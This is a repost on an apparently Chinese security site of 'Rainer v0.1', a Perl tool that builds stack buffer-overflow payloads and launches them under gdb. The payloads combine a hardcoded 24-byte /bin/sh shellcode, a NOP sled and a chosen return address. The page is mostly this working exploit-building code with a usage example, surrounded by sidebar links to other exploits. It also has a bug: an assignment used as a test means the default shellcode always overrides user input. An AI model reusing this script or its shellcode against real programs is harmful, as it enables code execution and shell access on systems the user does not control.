首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Rainer v0.1 by localh0t 来源：mattdch0@gmail.com 作者：localh0t 发布时间：2011-08-30   #!/usr/local/bin/perl   # Author: localh0t # Date: 18/06/11 # Contact: mattdch0@gmail.com # Follow: @mattdch   # Help if(!$ARGV[2])         {                  print "\n\n###########################";                  print "\n# Rainer v0.1 by localh0t #";                  print "\n###########################";                  print "\n\nUse: perl $0 -t [BINARY TARGET] -s [SHELLCODE (Optional)] -n [NOP's AMOUNT] -r [RETURN ADRESS] -m [RETURN METHOD (Optional)]\n";                  print "Example: perl $0 -t ExploitMe -s \"\\x31\\xc0\\x50\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x99\\x52\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80\" -n 60 -r \"\\xb8\\xf3\\xff\\xbf\" -m Normal\n";                  print "\nNote #1: If shellcode not defined, default to: 24 bytes /bin/sh shellcode.\n";                         print "Note #2: If method not defined, normal method will be used.\n\n";                  print "Methods:\n========\n";                  print "Normal : shellcode + nops + ret + null\n";                  print "NOPsled: nops + shellcode + ret + null\n\n";                  exit(0);         }   # Default shellcode, 24 bytes /bin/sh $default = "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x99\x52\x53\x89\xe1\xb0\x0b\xcd\x80";   # Set all to -1 my ($bin, $shell, $na, $ret, $meth) = -1;   # Giving values to variables foreach $loop (@ARGV) {         for ($loop) {                 /^-t$/ and do { $bin = $ARGV[($arg+1)]; last; };                 /^-s$/ and do { $shell = $ARGV[($arg+1)];  last; };                 /^-n$/ and do { $na = $ARGV[($arg+1)]; last; };                 /^-r$/ and do { $ret = $ARGV[($arg+1)]; last; };                 /^-m$/ and do { $meth = $ARGV[($arg+1)]; last; };         }         $arg++; }   # If shellcode not present, default used if ($shell = -1) {         $shell = $default; }   # NOPs payload $nops = "\x90"x$na;   # Functions sub normal{         my $bin = shift;         my $shell = shift;         my $nops  = shift;         my $ret  = shift;         $payload = 'gdb --eval-command="run" --args '.$bin.' $(printf "'.$shell.$nops.$ret.'\x00\x00\x00\x00")';         return $payload;   }   sub nopsled{         my $bin = shift;         my $nops  = shift;         my $shell = shift;         my $ret  = shift;         $payload = 'gdb --eval-command="run" --args '.$bin.' $(printf "'.$nops.$shell.$ret.'\x00\x00\x00\x00")';         return $payload;   }   # Main for ($meth) {   /^Normal$/    and do { $payload = &normal($bin,$shell,$nops,$ret); last; };   /^NOPsled$/     and do { $payload = &nopsled($bin,$nops,$shell,$ret);  last; };   -1    and do { $payload = &normal($bin,$shell,$nops,$ret); last; };   }   exec($payload);   __END__   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·构造注入点后门代码（asp,aspx,p ·mp3 Kaydet Local Buffer Overfl ·DVD X Player 5.5 Professional ·DVD X Player 5.5.0 Pro / Stand ·Free MP3 CD Ripper 1.1 Buffer ·Citrix Gateway ActiveX Control ·Windows7/win2008 提权0day ·Linux Kernel 'perf_count_sw_cp ·DVD X Player 5.5 .plf PlayList ·BroadWin WebAccess Client Mult ·Apple QuickTime PICT PnSize Bu ·Apache httpd Remote Denial of   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved